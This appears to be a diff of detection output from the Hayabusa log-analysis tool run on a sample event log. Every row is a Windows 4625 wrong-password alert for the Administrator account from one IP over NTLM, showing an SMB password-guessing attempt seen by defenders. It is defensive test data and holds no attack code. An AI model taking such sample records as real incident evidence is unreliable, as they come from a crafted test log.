+2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4shyxJk2PiH1TDlj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xZyN2WO3UVY0WQs6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oSQjAMckifap5r1k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qixqXiX0mVcuXe37  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gIfJCJz6l36WMeY9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SZxv5U7uoN6E8c8E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mlIfE0N32OQeWuNw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nkZcjpTmHcJ0uX38  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GZfaHr2Yq6xkRjOI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jvy0EIiPSnom7pn3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TN9PUb0BgI3u8Xax  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xCgz5BNpQgLgW0Xi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: po2GBdrXr3XtBsWR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O2rgo6jHcqu10IGY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MLblUOGzYzVA47E9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ysuA1xpYuAGRNONJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ksedziaGzXk5VNlS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: irIfGLQdhtRRGwuo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YCf6WUjiS11hHqKT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1o0CTT7GsWfCWuHx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F6Jr8XrUsmTiSdol  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Buj66iuSkLEQdKnQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L1wOLI51HqfkgO6r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X4oe273WXOICzkwW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1c7nGezYNJ70jR6R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ajuZ09zGeuovCQLg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: z4k7xV7soNF4mHlz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CtdqW8zOw1GoQcvA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aY6FLi1edRZWrRZN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ah1JoKfxJzQhCCVL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gIMOZRGcv4o33BWd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nmLyLJoVZz6fJ62I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aGufqEGD4hFf2XLM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7IEdKy2H5Agblpjt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XT9k8C05GVLBNPdl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5opHh8HelCXtR5Cm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K0dntDwYLmag9efo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UQfZOMFV9LtY7r2S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y01v38dTUIsJEZIv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pCP8x2QBZ6IvMEnf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hgcbYjw3kKqlK7Di  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TFU97Tq3e7IWvSKm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1hUCvaS1yM2FU9AE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8JInVlBqTSfT4J1s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EjXRQUGDKBZaMkw3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fZPXNxkGOrld5eCR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OBDhSrF7DZ1KBRa8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dQ7TKJOGibAVNoCH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZE1GARxx03m4FtEL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Gf3VLLTxsK85bsrv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 58G6MFVbW55JZIV5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Yxne9LqZCqBf3qkc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ssZya6gArnuepKyW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rsDEj6o0NaKUYPZL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pELSIsupIYAxPCtv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: urHCDmdCfNexxUHf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: czGXZFukLquA9Mce  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: icWMY9pKCQMyTxJg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v28FLC2WXEXSUiI5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FwhjHww5iA51SFjp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 96BwmhKqDIojhdRA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DiRvofjwoeAdHYrv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BNLdOrPwbvYELiCc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x15WKTspmg2ALHaY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QMoQWddkcYtCmoKm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jhTbfX42Pwn7OA2k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yXcbUCgAhVFfqLc3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GHyXVM0jpaKBiY9N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TZoWEcU6VbEnrLpx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LIfEzNQWwvrai4ga  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DhImfqWz7SHId9hE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s6sekQfneNE5uFtx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
